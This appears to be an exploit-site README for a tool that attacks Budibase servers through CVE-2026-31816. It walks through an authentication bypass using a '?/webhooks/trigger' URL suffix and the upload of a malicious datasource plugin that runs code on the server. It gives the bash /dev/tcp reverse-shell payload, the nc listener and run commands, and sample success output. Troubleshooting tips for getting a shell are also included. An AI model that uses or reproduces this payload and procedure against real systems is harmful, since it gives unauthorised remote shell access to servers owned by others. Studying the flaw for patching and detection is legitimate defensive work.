Share
## https://sploitus.com/exploit?id=57D0FD59-7FF6-570B-97F5-A09592D14883
# CVE-2026-31816 Reverse Shell Exploit
## Overview
This tool exploits CVE-2026-31816 to establish a reverse shell connection on a target Budibase server.
**Attack Chain**: Authentication Bypass โ Upload DATASOURCE Plugin โ Server-side Code Execution โ Reverse Shell
## Requirements
- Python 3.6+
- `requests` library (`pip install requests`)
- Target Budibase server vulnerable to CVE-2026-31816
## Usage
### Basic Steps
```bash
# 1. Start listener on attacker machine
nc -lvnp 4444
# 2. Run exploit (another terminal)
python3 CVE-2026-31816-rshell.py -t http://target:10000 --lhost YOUR_IP --lport 4444
```
### Parameters
| Parameter | Required | Description |
|-----------|----------|-------------|
| `-t, --target` | โ
| Target Budibase URL |
| `--lhost` | โ
| Listener host (your IP) |
| `--lport` | โ | Listener port (default: 4444) |
### Examples
```bash
# Attacker IP: 192.168.1.100
# Target Budibase: 192.168.1.128:10000
# Terminal 1 - Start listener
nc -lvnp 4444
# Terminal 2 - Run exploit
python3 CVE-2026-31816-rshell.py \
-t http://192.168.1.128:10000 \
--lhost 192.168.1.100 \
--lport 4444
```
## How It Works
### 1. Vulnerability Check
```
GET /api/integrations?/webhooks/trigger
```
If returns 200, target is vulnerable to authentication bypass.
### 2. Create Malicious Plugin
```json
{
"type": "datasource",
"schema": { ... }
}
```
DATASOURCE type plugins execute JavaScript code on the server.
### 3. Reverse Shell Payload
```javascript
// Executed when plugin is validated:
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
```
### 4. Upload and Execute
```
POST /api/plugin/upload?/webhooks/trigger
```
Upload plugin bypassing authentication. Code executes during validation.
## Attack Flow
```
โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ
โ Attacker โ โ Target โ โ Listener โ
โ โ โ Server โ โ (nc) โ
โ โ โ โ โ โ
โ exploit โโโโโผโโโโโบโ Upload โ โ โ
โ โ โ Plugin โ โ โ
โ โ โ Execute โโโโโโบโ Listen โ
โ โ โ Code โโโโโโโค Reverse โ
โ โ โ โ โ Connect โ
โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโ
```
## Success Indicator
```
============================================================
CVE-2026-31816 - Reverse Shell Exploit
============================================================
[*] Target: http://192.168.1.128:10000
[*] Reverse shell: 192.168.1.100:4444
[*] Checking vulnerability...
[+] Target is vulnerable!
[*] Creating reverse shell plugin targeting 192.168.1.100:4444
[*] Uploading reverse shell plugin...
[*] Status: 200
[+] Plugin installed successfully!
============================================================
[+] SUCCESS! Check your listener!
============================================================
```
## Troubleshooting
### Q: Connection failed, no shell received
**Possible causes**:
1. Firewall blocking reverse connection
2. Target server cannot reach attacker IP
3. Target server lacks bash
**Solutions**:
```bash
# Check network connectivity
ping YOUR_IP
# Check firewall
sudo ufw allow 4444/tcp
# Try different port
nc -lvnp 8080
```
### Q: Upload failed
**Possible causes**:
1. Target has patched the vulnerability
2. Network issues
**Solutions**:
```bash
# Manually test if vulnerability exists
curl -s "http://target:10000/api/integrations?/webhooks/trigger"
# If returns JSON, vulnerability exists
```